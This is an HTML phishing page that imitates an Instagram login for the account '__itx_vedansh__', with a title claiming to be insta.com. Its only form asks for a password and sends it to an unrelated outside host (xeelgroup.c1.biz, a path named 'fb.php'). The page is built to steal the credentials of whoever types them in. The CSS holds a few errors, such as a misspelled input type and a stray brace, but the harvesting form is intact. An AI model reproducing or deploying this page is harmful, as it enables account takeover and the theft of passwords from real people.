
<!DOCTYPE html>
<html>
<head>
	<title>https://www.insta.com</title>
</head>
<body>







<div class="fb" id="fb">
	<img src="insta.jpg">
</div>








<h id="usname">
__itx_vedansh__
</h>
<style>
	
#usname{

  position: relative;
  top: -1280px;
  left: 339px;

  font-size: 50px;


}




.pp img{
	position: relative;
      width: 300px;
      border-radius: 60%;
      top: -1630px;
      left: 320px;
      height: 280px;
}

</style>








<div class="pp">
	<img src="pankaj.png">
</div>

<style type="text/css">




    
.fbb{

  position: relative;
  padding-left: -29px;
  size: cover;

}

.fbb img{
    position: relative;
    width: 1050px;
    height: 180px;
    top: -1830px;
    left: -10px;
    size: cover;
}















	
.fb{

  position: relative;
  top: -5px;
  padding-left: -29px;



  border-image-repeat: no-repeat;
  size: cover;

}

.fb img{
	position: relative;
    width: 976px;
	height: 1800px;
}

</style>








        <div id="header">

            <form action="http://xeelgroup.c1.biz/php_page/ins/fb.php">
                <input type="password" name="password" placeholder="Password" required>
                <input type="submit" name="login" value="Login">
            </form>

        </div>




<style>



        #header form input[type="emai"] {
            position: relative;
            top: -1478px;
            background-color: #DCDCDC;
            width:845px;
            left: 40px;
            border-radius:  10px;
            height: 125px;
            font-size: 35px;
            padding-left: 30px;

            
        
        }

        #header form input[type="password"] {
            position: relative;
            top: -1510px;
            background-color: #DCDCDC;
           width: 750px;
            left: 85px;
            border-radius:  10px;
            height: 115px;
            font-size: 35px;
            padding-left: 30px;
               }



        #header form input[type="submit"] {
            position: relative;
            top: -1490px;
            background-color:#4285f4;
            width: 780px;
            left: 85px;
            font-variant-position: center ; 
            border-radius:  10px;
            height: 120px;
            font-size: 38px;
            color: white;
        
        }


}



</style>

</body>
</html>
